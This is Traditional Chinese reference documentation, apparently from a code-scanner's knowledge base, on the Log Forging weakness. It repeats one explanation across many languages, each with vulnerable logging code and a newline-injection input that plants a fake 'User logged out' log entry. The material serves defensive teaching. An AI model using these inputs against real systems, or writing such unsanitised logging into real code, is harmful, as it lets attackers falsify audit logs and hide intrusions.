如果攻擊者可以提供資料給會持續逐字記錄內容的應用程式，則可能會妨礙或是誤導記錄檔的解讀。在大多數理想的情況下，攻擊者可能會藉由提供應用程式包含適當字元的輸入，而將錯誤的項目插入記錄檔。如果記錄檔是自動化處理的，那麼攻擊者就可能能夠藉由破壞檔案格式或插入預期外字元的方式，來使檔案無法使用。更猛烈的惡意攻擊甚至可能導致記錄檔的統計資料產生偏差。藉由偽造或其他方式，毀損的記錄檔可用來掩護攻擊者的追蹤，或甚至授意第三方執行惡意行為 [1]。最糟糕的情況是，攻擊者可能會在記錄檔中插入程式碼或其他指令，並利用記錄檔理公用程式的弱點進行破壞 [2]。

範例：以下 Web 應用程式程式碼嘗試從要求物件中讀取整數值。如果這個值無法解析成一個整數，那麼就會記錄此輸入並附帶一個錯誤訊息，說明發生哪些情況。

...
string val = (string)Session["val"];
try {
int value = Int32.Parse(val);
}
catch (FormatException fe) {
log.Info("Failed to parse val= " + val);
}
...

如果使用者提交用於 val 的字串「twenty-one」，則會記錄以下項目：

INFO: Failed to parse val=twenty-one

不過，如果攻擊者傳遞了字串「twenty-one%0a%0aINFO:+User+logged+out%3dbadguy」，則會記錄以下的項目：

INFO: Failed to parse val=twenty-one

INFO: User logged out=badguy

您可以清楚發現，攻擊者可能使用相同的機制來插入任何記錄檔項目。

Log Forging 弱點會在以下情況中出現：

1. 資料從不可信賴的來源進入應用程式。

2. 資料被寫入應用程式或系統日誌檔。

一般來說，應用程式會使用記錄檔來儲存事件或交易的歷史記錄，以便之後進行檢閱、統計資料蒐集或除錯之用。根據應用程式的本質，日誌檔可以在需要的時候手動地進行檢索，或者藉由使用工具自動地進行檢索，以得到重要的資料點以及資料趨勢。

如果一個攻擊者能給應用程式提供隨後會被逐字記錄到記錄檔的資料資訊，記錄檔的檢查可能會被妨礙，甚至基於記錄資料的總結可能是錯誤的。攻擊者能夠在他們的資料中包含記錄項目分隔符號字元的話，那他們就可以在記錄中插入錯誤的項目資訊。如果記錄檔是自動化處理的，那麼攻擊者就可能能夠藉由破壞檔案格式或插入預期外字元的方式，來使檔案無法使用。更猛烈的惡意攻擊甚至可能導致記錄檔的統計資料產生偏差。藉由偽造或其他方式，毀損的記錄檔可用來掩護攻擊者的追蹤，或甚至授意第三方執行惡意行為 [1]。在最糟糕的情況中，攻擊者可以在記錄檔中注入程式碼或者其他的指令，充分利用記錄處理公用程式的弱點 [2]。

範例：以下程式碼從一個 CGI script 中接收一個由使用者提交的字串，並試圖將其轉換為長整型的數值。如果這個數值沒能被解譯成一個數位，那麼輸入資訊就會存入記錄，提示錯誤。

long value = strtol(val, &endPtr, 10);
if (*endPtr != '\0')
	syslog(LOG_INFO,"Illegal value = %s",val);
...

如果使用者提交用於 val 的字串「twenty-one」，則會記錄以下項目：

Illegal value=twenty-one

不過，如果攻擊者傳遞了字串「twenty-one\n\nINFO: User logged out=evil」，則會記錄以下的項目：

	INFO: Illegal value=twenty-one

	INFO: User logged out=evil

很顯然，攻擊者可能使用此相同的機制來插入任意記錄項目。為了使這種類型的 log forging 攻擊更有效，攻擊者必須首先定義有效的記錄項目格式，但是這通常是以應用程式的系統資訊洩露為代價的。

Log Forging 弱點會在以下情況中出現：

1. 資料從不可信賴的來源進入應用程式。

2. 將資料寫入應用程式或系統記錄檔。

一般來說，應用程式會使用記錄檔來儲存事件或交易的歷史記錄，以便之後進行檢閱、統計資料蒐集或除錯之用。根據應用程式的本質而定，檢閱日誌檔的工作可在需要時手動執行，或者自動執行，方法為使用工具自動選取重要事件或帶有某種傾向資訊的記錄檔。

如果攻擊者可以提供資料給會持續逐字記錄內容的應用程式，則可能會妨礙或是誤導記錄檔的解讀。在大多數理想的情況下，攻擊者可能會藉由向應用程式提供包含適當字元的輸入，而將錯誤的項目插入記錄檔。如果記錄檔是自動化處理的，那麼攻擊者就可以藉由破壞檔案格式或插入預期外字元的方式，來使檔案無法使用。更猛烈的惡意攻擊甚至可能導致記錄檔的統計資料產生偏差。藉由偽造或其他方式，毀損的記錄檔可用來掩護攻擊者的追蹤，或甚至授意第三方執行惡意行為 [1]。最糟糕的情況是，攻擊者可能會在記錄檔中插入程式碼或其他指令，並利用記錄檔處理公用程式的弱點進行破壞 [2]。

範例： 以下的 Web 應用程式程式碼嘗試從 HTML 表單中讀取數值。然後記錄此數值。

...
01  LOGAREA.
     05  VALHEADER        PIC X(50) VALUE 'VAL: '.
     05  VAL              PIC X(50).
...

EXEC CICS
  WEB READ
  FORMFIELD(NAME)
  VALUE(VAL)
  ...
END-EXEC.

EXEC DLI
  LOG
  FROM(LOGAREA)
  LENGTH(50)
END-EXEC.
...

如果使用者提交用於 VAL 的字串「FOO」，則會記錄以下項目：

VAL: FOO

不過，如果攻擊者傳遞了字串「FOO VAL: BAR」，則會記錄以下的項目：

VAL: FOO VAL: BAR

您可以清楚發現，攻擊者可能使用相同的機制來插入任何記錄檔項目。

Log Forging 弱點會在以下情況中出現：

1. 資料從不可信賴的來源進入應用程式。


2. 將資料寫入應用程式或系統記錄檔。


一般來說，應用程式會使用記錄檔來儲存事件或交易的歷史記錄，以便之後進行檢閱、統計資料蒐集或除錯之用。根據應用程式的本質而定，檢閱日誌檔的工作可在需要時手動執行，或者自動執行，方法為使用工具自動選取重要事件或帶有某種傾向資訊的記錄檔。

如果攻擊者可以提供資料給會持續逐字記錄內容的應用程式，則可能會妨礙或是誤導記錄檔的解讀。在大多數理想的情況下，攻擊者可能會藉由提供應用程式包含適當字元的輸入，而將錯誤的項目插入記錄檔。如果記錄檔是自動化處理的，那麼攻擊者就可能能夠藉由破壞檔案格式或插入預期外字元的方式，來使檔案無法使用。更猛烈的惡意攻擊甚至可能導致記錄檔的統計資料產生偏差。藉由偽造或其他方式，毀損的記錄檔可用來掩護攻擊者的追蹤，或甚至授意第三方執行惡意行為 [1]。最糟糕的情況是，攻擊者可能會在記錄檔中插入程式碼或其他指令，並利用記錄檔理公用程式的弱點進行破壞 [2]。

範例： 以下的 Web 應用程式程式碼嘗試從網頁表單中讀取整數值。如果這個值無法解析成一個整數，那麼就會記錄此輸入並附帶一個錯誤訊息，說明發生哪些情況。

<cflog file="app_log" application="No" Thread="No" 
       text="Failed to parse val="#Form.val#">

如果使用者提交用於 val 的字串「twenty-one」，則會記錄以下項目：

"Information",,"02/28/01","14:50:37",,"Failed to parse val=twenty-one"

不過，如果攻擊者傳遞了字串「twenty-one%0a%0a%22Information%22%2C%2C%2202/28/01%22%2C%2214:53:40%22%2C%2C%22User%20logged%20out:%20badguy%22」，則會記錄以下的項目：

"Information",,"02/28/01","14:50:37",,"Failed to parse val=twenty-one"

"Information",,"02/28/01","14:53:40",,"User logged out: badguy"

您可以清楚發現，攻擊者可能使用相同的機制來插入任何記錄檔項目。

Log Forging 弱點會在以下情況中出現：

1.資料從不可信賴的來源進入應用程式。

2.將資料寫入應用程式或系統記錄檔。

一般來說，應用程式會使用記錄檔來儲存事件的歷史記錄、檢視交易以便之後進行檢閱、統計資料蒐集或除錯之用。根據應用程式的本質而定，檢閱記錄檔的工作可在需要時手動執行，或者自動執行，方法為使用工具自動選取重要事件或帶有某種傾向資訊的記錄檔。

如果攻擊者可以提供資料給會持續逐字記錄內容的應用程式，則可能會妨礙或是誤導記錄檔的解讀。在大多數理想的情況下，攻擊者可能會藉由向應用程式提供包含適當字元的輸入，而將錯誤的項目插入記錄檔。如果記錄檔是自動化處理的，那麼攻擊者就有可能藉由破壞檔案格式或插入預期外字元的方式，使檔案無法使用。更猛烈的惡意攻擊甚至可能導致記錄檔的統計資料產生偏差。藉由偽造或其他方式，毀損的記錄檔可用來掩護攻擊者的追蹤，或甚至授意第三方執行惡意行為 [1]。最糟糕的情況是，攻擊者可能會在記錄檔中插入程式碼或其他指令，並利用記錄檔處理公用程式的弱點進行破壞 [2]。

範例：以下 Web 應用程式程式碼嘗試從一個要求物件中讀取整數值。如果這個值無法解析成一個整數，那麼就會記錄此輸入並附帶一條錯誤訊息，說明發生哪些情況。

    func someHandler(w http.ResponseWriter, r *http.Request){
        r.parseForm()
        name := r.FormValue("name")
        logout := r.FormValue("logout")
        ...
        if (logout){
            ...
        } else {
            log.Printf("Attempt to log out: name: %s logout: %s", name, logout)
        }
    }

如果使用者提交字串「twenty-one」給 logout，且能夠建立名稱為「admin」的使用者，則會記錄以下項目：

Attempt to log out: name: admin logout: twenty-one

不過，若攻擊者能建立「admin+logout:+1+++++++++++++++++++++++」這個使用者名稱，則會記錄以下項目：

Attempt to log out: name: admin logout: 1                       logout: twenty-one

Log Forging 弱點會在以下情況中出現：

1. 資料從不可信賴的來源進入應用程式。

2. 將資料寫入應用程式或系統記錄檔。

一般來說，應用程式會使用記錄檔來儲存事件或交易的歷史記錄，以便之後進行檢閱、統計資料蒐集或除錯之用。根據應用程式的本質而定，檢閱日誌檔的工作可在需要時手動執行，或者自動執行，方法為使用工具自動選取重要事件或帶有某種傾向資訊的記錄檔。

如果攻擊者可以提供資料給會持續逐字記錄內容的應用程式，則可能會妨礙或是誤導記錄檔的解讀。在大多數理想的情況下，攻擊者可能會藉由提供應用程式包含適當字元的輸入，而將錯誤的項目插入記錄檔。如果記錄檔是自動化處理的，那麼攻擊者就可能能夠藉由破壞檔案格式或插入預期外字元的方式，來使檔案無法使用。更猛烈的惡意攻擊甚至可能導致記錄檔的統計資料產生偏差。藉由偽造或其他方式，毀損的記錄檔可用來掩護攻擊者的追蹤，或甚至授意第三方執行惡意行為 [1]。最糟糕的情況是，攻擊者可能會在記錄檔中插入程式碼或其他指令，並利用記錄檔理公用程式的弱點進行破壞 [2]。

範例 1：以下 Web 應用程式程式碼嘗試從一個要求物件中讀取整數值。如果這個值無法解析成一個整數，那麼就會記錄此輸入並附帶一個錯誤訊息，說明發生哪些情況。

var cp = require('child_process');
var http = require('http');
var url = require('url');

function listener(request, response){
  var val = url.parse(request.url, true)['query']['val'];
  if (isNaN(val)){
    console.log("INFO: Failed to parse val = " + val);
  }
  ...
}
...
http.createServer(listener).listen(8080);
...

如果使用者提交用於 val 的字串「twenty-one」，則會記錄以下項目：

INFO: Failed to parse val = twenty-one

不過，如果攻擊者傳遞了字串「twenty-one%0a%0aINFO:+User+logged+out%3dbadguy」，則會記錄以下的項目：

INFO: Failed to parse val=twenty-one

INFO: User logged out=badguy

您可以清楚發現，攻擊者可能使用相同的機制來插入任何記錄檔項目。

Log Forging 弱點會在以下情況中出現：

1. 資料從不可信賴的來源進入應用程式。

2. 將資料寫入應用程式或系統記錄檔。

一般來說，應用程式會使用記錄檔來儲存事件或交易的歷史記錄，以便之後進行檢閱、統計資料蒐集或除錯之用。根據應用程式的本質，日誌檔可以在需要的時候手動地進行檢索，或者藉由使用工具自動地進行檢索，以得到重要的資料點以及資料趨勢。

如果一個攻擊者能給應用程式提供隨後會被逐字記錄到記錄檔的資料資訊，記錄檔的檢查可能會被妨礙，甚至基於記錄資料的總結可能是錯誤的。攻擊者能夠在他們的資料中包含記錄項目分隔符號字元的話，那他們就可以在記錄中插入錯誤的項目資訊。如果記錄檔是自動化處理的，那麼攻擊者就可能能夠藉由破壞檔案格式或插入預期外字元的方式，來使檔案無法使用。更猛烈的惡意攻擊甚至可能導致記錄檔的統計資料產生偏差。藉由偽造或其他方式，毀損的記錄檔可用來掩護攻擊者的追蹤，或甚至授意第三方執行惡意行為 [1]。在最糟糕的情況中，攻擊者可以在記錄檔中注入程式碼或者其他的指令，充分利用記錄處理公用程式的弱點 [2]。

範例 1：以下程式碼從一個 CGI script 中接收一個由使用者提交的字串，並試圖將其轉換為長整型的數值。如果這個數值沒能被解譯成一個數位，那麼輸入資訊就會存入記錄，提示錯誤。

long value = strtol(val, &endPtr, 10);
if (*endPtr != '\0')
	NSLog("Illegal value = %s",val);
...

如果使用者提交用於 val 的字串「twenty-one」，則會記錄以下項目：

    INFO: Illegal value=twenty-one

不過，如果攻擊者傳遞了字串「twenty-one\n\nINFO: User logged out=evil」，則會記錄以下的項目：

	INFO: Illegal value=twenty-one

	INFO: User logged out=evil

很顯然，攻擊者可能使用此相同的機制來插入任意記錄項目。為了使這種類型的 Log Forging 攻擊有效，攻擊者必須首先識別有效的記錄項目格式，但這通常是以目標應用程式的系統資訊洩漏為代價的。

Log Forging 弱點會在以下情況中出現：

1. 資料從不可信賴的來源進入應用程式。

2. 將資料寫入應用程式或系統記錄檔。

一般來說，應用程式會使用記錄檔來儲存事件或交易的歷史記錄，以便之後進行檢閱、統計資料蒐集或除錯之用。根據應用程式的本質而定，檢閱日誌檔的工作可在需要時手動執行，或者自動執行，方法為使用工具自動選取重要事件或帶有某種傾向資訊的記錄檔。

如果攻擊者可以提供資料給會持續逐字記錄內容的應用程式，則可能會妨礙或是誤導記錄檔的解讀。在大多數理想的情況下，攻擊者可能會藉由提供應用程式包含適當字元的輸入，而將錯誤的項目插入記錄檔。如果記錄檔是自動化處理的，那麼攻擊者就可能能夠藉由破壞檔案格式或插入預期外字元的方式，來使檔案無法使用。更猛烈的惡意攻擊甚至可能導致記錄檔的統計資料產生偏差。藉由偽造或其他方式，毀損的記錄檔可用來掩護攻擊者的追蹤，或甚至授意第三方執行惡意行為 [1]。最糟糕的情況是，攻擊者可能會在記錄檔中插入程式碼或其他指令，並利用記錄檔理公用程式的弱點進行破壞 [2]。

範例：以下 Web 應用程式程式碼嘗試從一個要求物件中讀取整數值。如果這個值無法解析成一個整數，那麼就會記錄此輸入並附帶一個錯誤訊息，說明發生哪些情況。

<?php
    $name   =$_GET['name'];
    ...
    $logout =$_GET['logout'];

    if(is_numeric($logout))
    {
        ...
    }
    else
    {
        trigger_error("Attempt to log out: name: $name logout: $val");
    }
?>

如果使用者提交字串「twenty-one」給 logout，且能夠建立名稱為「admin」的使用者，則會記錄以下項目：

PHP Notice: Attempt to log out: name: admin logout: twenty-one

不過，若攻擊者能建立「admin+logout:+1+++++++++++++++++++++++」這個使用者名稱，則會記錄以下項目：

PHP Notice: Attempt to log out: name: admin logout: 1                       logout: twenty-one

Log Forging 弱點會在以下情況中出現：

1. 資料從不可信賴的來源進入應用程式。

2. 將資料寫入應用程式或系統記錄檔。

一般來說，應用程式會使用記錄檔來儲存事件或交易的歷史記錄，以便之後進行檢閱、統計資料蒐集或除錯之用。根據應用程式的本質而定，檢閱日誌檔的工作可在需要時手動執行，或者自動執行，方法為使用工具自動選取重要事件或帶有某種傾向資訊的記錄檔。

如果攻擊者可以提供資料給會持續逐字記錄內容的應用程式，則可能會妨礙或是誤導記錄檔的解讀。在大多數理想的情況下，攻擊者可能會藉由提供應用程式包含適當字元的輸入，而將錯誤的項目插入記錄檔。如果記錄檔是自動化處理的，那麼攻擊者就可能能夠藉由破壞檔案格式或插入預期外字元的方式，來使檔案無法使用。更猛烈的惡意攻擊甚至可能導致記錄檔的統計資料產生偏差。藉由偽造或其他方式，毀損的記錄檔可用來掩護攻擊者的追蹤，或甚至授意第三方執行惡意行為 [1]。最糟糕的情況是，攻擊者可能會在記錄檔中插入程式碼或其他指令，並利用記錄檔理公用程式的弱點進行破壞 [2]。

範例：以下 Web 應用程式程式碼嘗試從一個要求物件中讀取整數值。如果這個值無法解析成一個整數，那麼就會記錄此輸入並附帶一個錯誤訊息，說明發生哪些情況。

    name = req.field('name')
    ...
    logout = req.field('logout')

    if (logout):
        ...
    else:
        logger.error("Attempt to log out: name: %s logout: %s" % (name,logout))

如果使用者提交字串「twenty-one」給 logout，且能夠建立名稱為「admin」的使用者，則會記錄以下項目：

Attempt to log out: name: admin logout: twenty-one

不過，若攻擊者能建立「admin+logout:+1+++++++++++++++++++++++」這個使用者名稱，則會記錄以下項目：

Attempt to log out: name: admin logout: 1                       logout: twenty-one

Log Forging 弱點會在以下情況中出現：

1. 資料從不可信賴的來源進入應用程式。

2. 將資料寫入應用程式或系統記錄檔。

一般來說，應用程式會使用記錄檔來儲存事件或交易的歷史記錄，以便之後進行檢閱、統計資料蒐集或除錯之用。根據應用程式的本質而定，檢閱日誌檔的工作可在需要時手動執行，或者自動執行，方法為使用工具自動選取重要事件或帶有某種傾向資訊的記錄檔。

如果攻擊者可以提供資料給會持續逐字記錄內容的應用程式，則可能會妨礙或是誤導記錄檔的解讀。在大多數理想的情況下，攻擊者可能會藉由提供應用程式包含適當字元的輸入，而將錯誤的項目插入記錄檔。如果記錄檔是自動化處理的，那麼攻擊者就可能能夠藉由破壞檔案格式或插入預期外字元的方式，來使檔案無法使用。更猛烈的惡意攻擊甚至可能導致記錄檔的統計資料產生偏差。藉由偽造或其他方式，毀損的記錄檔可用來掩護攻擊者的追蹤，或甚至授意第三方執行惡意行為 [1]。最糟糕的情況是，攻擊者可能會在記錄檔中插入程式碼或其他指令，並利用記錄檔理公用程式的弱點進行破壞 [2]。

範例 1：以下 Web 應用程式程式碼嘗試從一個要求物件中讀取整數值。如果這個值無法解析成一個整數，那麼就會記錄此輸入並附帶一個錯誤訊息，說明發生哪些情況。

...
val = req['val']
unless val.respond_to?(:to_int)
  logger.info("Failed to parse val")
  logger.info(val)
end
...

如果使用者提交用於 val 的字串「twenty-one」，則會記錄以下項目：

INFO: Failed to parse val
INFO: twenty-one

不過，如果攻擊者傳遞了字串「twenty-one%0a%0aINFO:+User+logged+out%3dbadguy」，則會記錄以下的項目：

INFO: Failed to parse val
INFO: twenty-one

INFO: User logged out=badguy

您可以清楚發現，攻擊者可能使用相同的機制來插入任何記錄檔項目。

Log Forging 弱點會在以下情況中出現：

1. 資料從不可信賴的來源進入應用程式。

2. 將資料寫入應用程式或系統記錄檔。

一般來說，應用程式會使用記錄檔來儲存事件或交易的歷史記錄，以便之後進行檢閱、統計資料蒐集或除錯之用。根據應用程式的本質，日誌檔可以在需要的時候手動地進行檢索，或者藉由使用工具自動地進行檢索，以得到重要的資料點以及資料趨勢。

如果一個攻擊者能給應用程式提供隨後會被逐字記錄到記錄檔的資料資訊，記錄檔的檢查可能會被妨礙，甚至基於記錄資料的總結可能是錯誤的。攻擊者能夠在他們的資料中包含記錄項目分隔符號字元的話，那他們就可以在記錄中插入錯誤的項目資訊。如果記錄檔是自動化處理的，那麼攻擊者就可能能夠藉由破壞檔案格式或插入預期外字元的方式，來使檔案無法使用。更猛烈的惡意攻擊甚至可能導致記錄檔的統計資料產生偏差。藉由偽造或其他方式，毀損的記錄檔可用來掩護攻擊者的追蹤，或甚至授意第三方執行惡意行為 [1]。在最糟糕的情況中，攻擊者可以在記錄檔中注入程式碼或者其他的指令，充分利用記錄處理公用程式的弱點 [2]。

範例 1：以下程式碼接受一個由使用者提交的字串，並嘗試將其轉換為所表示的整數值。如果這個數值沒能被解譯成一個數位，那麼輸入資訊就會存入記錄，提示錯誤。

...
let num = Int(param)
if num == nil {
    NSLog("Illegal value = %@", param)
}
...

如果使用者提交用於 val 的字串「twenty-one」，則會記錄以下項目：

    INFO: Illegal value = twenty-one

不過，如果攻擊者傳遞了字串「twenty-one\n\nINFO: User logged out=evil」，則會記錄以下的項目：

	INFO: Illegal value=twenty-one

	INFO: User logged out=evil

很顯然，攻擊者可能使用此相同的機制來插入任意記錄項目。為了使這種類型的 Log Forging 攻擊有效，攻擊者必須首先識別有效的記錄項目格式，但這通常是以目標應用程式的系統資訊洩漏為代價的。

Log Forging 弱點會在以下情況中出現：

1. 資料從不可信賴的來源進入應用程式。

2. 將資料寫入應用程式或系統記錄檔。

一般來說，應用程式會使用記錄檔來儲存事件或交易的歷史記錄，以便之後進行檢閱、統計資料蒐集或除錯之用。根據應用程式的本質而定，檢閱日誌檔的工作可在需要時手動執行，或者自動執行，方法為使用工具自動選取重要事件或帶有某種傾向資訊的記錄檔。

如果攻擊者可以提供資料給會持續逐字記錄內容的應用程式，則可能會妨礙或是誤導記錄檔的解讀。在大多數理想的情況下，攻擊者可能會藉由提供應用程式包含適當字元的輸入，而將錯誤的項目插入記錄檔。如果記錄檔是自動化處理的，那麼攻擊者就可能能夠藉由破壞檔案格式或插入預期外字元的方式，來使檔案無法使用。更猛烈的惡意攻擊甚至可能導致記錄檔的統計資料產生偏差。藉由偽造或其他方式，毀損的記錄檔可用來掩護攻擊者的追蹤，或甚至授意第三方執行惡意行為 [1]。最糟糕的情況是，攻擊者可能會在記錄檔中插入程式碼或其他指令，並利用記錄檔理公用程式的弱點進行破壞 [2]。

範例：以下 Web 應用程式程式碼嘗試從要求物件中讀取整數值。如果這個值無法解析成一個整數，那麼就會記錄此輸入並附帶一個錯誤訊息，說明發生哪些情況。

...
Dim Val As Variant
Dim Value As Integer
Set Val = Request.Form("val")
If IsNumeric(Val) Then
	Set Value = Val
Else
	App.EventLog "Failed to parse val=" & Val, 1
End If
...

如果使用者提交用於 val 的字串「twenty-one」，則會記錄以下項目：

Failed to parse val=twenty-one

不過，如果攻擊者傳遞了字串「twenty-one%0a%0a+User+logged+out%3dbadguy」，則會記錄以下的項目：

Failed to parse val=twenty-one

User logged out=badguy

您可以清楚發現，攻擊者可能使用相同的機制來插入任何記錄檔項目。